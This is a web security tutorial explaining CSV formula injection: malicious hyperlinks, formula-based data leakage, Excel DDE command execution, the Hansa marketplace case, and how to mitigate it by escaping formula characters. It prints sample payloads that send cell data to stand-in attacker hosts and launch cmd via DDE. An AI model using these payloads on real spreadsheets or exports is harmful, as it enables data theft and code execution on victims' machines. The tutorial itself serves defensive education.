Online attacks are more frequent than ever, and this trend is likely to continue growing. In this article, we analyze CSV injection attacks and how to defend against them.
Requirements:
- Domain – A domain to perform the tests
- Programming – Very high level of programming knowledge
Responsibility:
In this tutorial, we will use hacking techniques for educational purposes only. We do not promote their use for profit or improper purposes. We are not responsible for any damage or harm that may be caused to the systems used. The user of this tutorial is solely responsible.
Knowledge:
- Linux – High
- Programming – Very High
- Kali Linux – Not applicable
- Windows – Not applicable
- Networking – High
Overall Tutorial Level: Very High
Ideal for: Programmers, Code Security Analysts
Comma-separated value files, or CSV files, are practically everywhere these days. If you work in an office environment (actually, do people still do that?), you have most likely sent, received, and opened CSV files in Microsoft Excel or Google Sheets at one time or another. CSV files allow us to structure complex data sets in a human-readable format.
But CSV files, despite their practicality, also represent a serious attack vector in the form of CSV injection attacks. CSV injection attacks, also known as formula injection attacks, can occur when a website or web application allows users to export data to a CSV file without validating its content. Without validation, the exported CSV file could contain maliciously crafted formulas. If a malicious formula is executed by CSV applications, such as Microsoft Excel, Apple Numbers, or Google Sheets, among others, it could compromise your data, your system, or both.
Another way to use CSV files as an attack vector is to embed malicious links within the file. If a user clicks on the malicious link, all sorts of bad things can happen.
What are CSV files?
You have most likely opened a CSV file at some point. If you have ever used Microsoft Excel, you have played with CSV files.
A comma-separated values (CSV) file is simply a plain text file that contains data. CSV files are often used to exchange data, usually databases, between different applications.
CSV files are sometimes referred to as character-separated values or comma-delimited files. The comma character is used to separate (or delimit) the different data points. Other characters, such as semicolons, are also sometimes used for delimiting, although commas are the most common. The advantage of using CSV files is that you can export complex data from one application to a CSV file and import it into another application. You can also perform operations on the data usingfórmulas o macros.

For example, the image from the spreadsheet above looks like this in .csv format when opened in a text editor:

Note that each value is separated by a comma, hence the name Comma Separated Values (CSV).
Types of CSV injection attacks
Malicious links
Why are CSV files dangerous? Well, there are three ways in which they are dangerous. The first way CSV files can be used to perpetrate an attack is actually shared by any digital file that displays text and supports hyperlinks. It is simply by embedding a malicious link in one of the cells. If an unsuspecting user clicks on the malicious link, they may have compromised their system, their data, or both. This attack vector can be mitigated with a little common sense: don’t click on links in untrusted files (CSV or otherwise). Microsoft Excel will ask for user confirmation before following the link, but most people expect to find links embedded in trusted CSV files and will ignore the security warning.
Such a link might look like this:
=HYPERLINK(“http://ReallyEvilSite.com?leak=”&A1&“ ”&B1, “Click for more”)
This would funnel the information contained in the CSV file to the attacker’s server upon clicking.
CSV applications
But there is another, much more common attack vector with CSV files: CSV applications themselves. To render the spreadsheet with the correct values, CSV applications execute all formulas just before the spreadsheet is displayed. This means that no user interaction is required for formulas or macros to run. Therefore, if a malicious formula was embedded in the spreadsheet, all that needs to happen for it to execute automatically is for an unsuspecting user to open the compromised CSV file.
Formulas or macros are essentially equations that are executed between the different data points contained in the file. Let’s say, for example, that you have a simple spreadsheet with two columns: column A lists your weekly income, and column B lists your weekly expenses. You could use a formula to subtract the costs from the income and list the resulting data in a third column (C). Such a formula would look like this: =A1-B1. Formulas, for CSV files, all begin with one of the following characters: Equal (=), Plus (+), Minus (-), At (@).
The following example is a malicious formula that would silently funnel the contents of a Google Sheets document to a server controlled by the attacker:
=IMPORTXML(CONCAT(“”http://evilsite.com?leak=“”, CONCATENATE(A2:B2)), ‘’//a“”)
Dynamic Data Exchange
The third CSV attack is unique to Windows computers. Microsoft implemented a feature in Excel called Dynamic Data Exchange (DDE). DDE allows Excel to talk to other parts of the system and even launch applications. Therefore, using DDE, a malicious attacker could craft a malicious formula to launch the command prompt and execute arbitrary code on the machine in question. This could also be crafted as a link. In this case, as in the previous one, a Windows pop-up window appears asking the user if they trust the link. The user must click “Yes” to follow the link. Although this is intended as a CSV attack mitigation measure, most users expect their spreadsheets to interact with their computer, at least in an office environment.
Below is an example of using DDE to launch the terminal and start pinging a remote computer, which could result in a DDOS attack (more victims would be needed, of course).
=cmd|’/C ping -t 172.0.0.1 -l 25152’!’A1′
Social engineering
Like many other online attacks, CSV injection attacks involve some form of social engineering to get the victim to open the CSV file or open it and click on a malicious link. This could be an email, a Facebook post, whatever. Be wary of random links
Example of a CSV injection attack
In June 2018, Dutch police took control of the dark web marketplace Hansa using a CSV injection attack.
The Hansa marketplace sold drugs via the dark web (Tor). Marketplace users could download a text file containing a list of their recent purchases. When Dutch police took control of the site on June 20, 2018, they modified the web server code and replaced the “recent purchases” text file with a CSV file. The CSV file contained a malicious payload that would send users’ IP addresses to a server controlled by Dutch police. Sixty-four sellers took the bait. And during the time the server was under the control of the Dutch police, the operation accumulated 27,000 drug transactions in 27 days.
How to mitigate CSV injection attacks
The way to mitigate these types of attacks is actually quite simple. Its implementation only varies depending on your scenario.
There are two scenarios:
- Your website/application produces CSV files
- Your website/application consumes CSV files
Your website/application produces CSV files
If your application produces CSV files, you can perform whitelist validation on the untrusted input and disallow the characters Equal (=), Plus (+), Minus (-), and At (@). Whitelist validation simply means creating a whitelist of allowed characters and comparing the input to the whitelist. Any characters not on the whitelist are rejected and removed. This is probably the most secure method. However, it assumes that your website/application does not need to allow these characters to perform its functions.
If you need to accept those characters, you can encode the cell values so that the CSV application does not treat them as formulas by preceding cell values that begin with the characters: =, +, – or @ with a single quote. This method is called “escaping” the characters and ensures that these characters will be interpreted as data and not as formulas.
Your website/application consumes CSV files
If your website or application ingests CSV files produced elsewhere, you will need to validate and encode the file’s content before it is processed by your application. The exact way to achieve this depends on your site’s architecture and is therefore beyond the scope of this article.
However, many online articles on CSV injection mitigation recommend only validating and encoding cells that contain the offending characters (=, +, -, and @). I would recommend encoding all cells, not just those containing: =, +, -, or @. All data will still be interpretable by the application, and you can be sure that none of the cells will be interpreted as a formula.
Conclusion
CSV injection can have really nasty consequences. Fortunately, protecting your website/application is not difficult. Simply do not allow characters that are interpreted as formulas by CSV applications, or validate and encode CSV input.
But since this attack requires some form of social engineering to carry out, as a user, there are some common-sense measures you can take to reduce your chances of becoming a victim.
- Use a firewall: All major operating systems have a built-in input firewall, and all commercial routers on the market have a built-in NAT firewall. Make sure they are enabled, as they can protect you if you click on a malicious link.
- If your CSV application displays a warning about a link you are trying to access, you should pay attention and inspect the link carefully.
- Do not click on email attachments unless you know exactly who sent them and what they are.
I hope you enjoyed this content.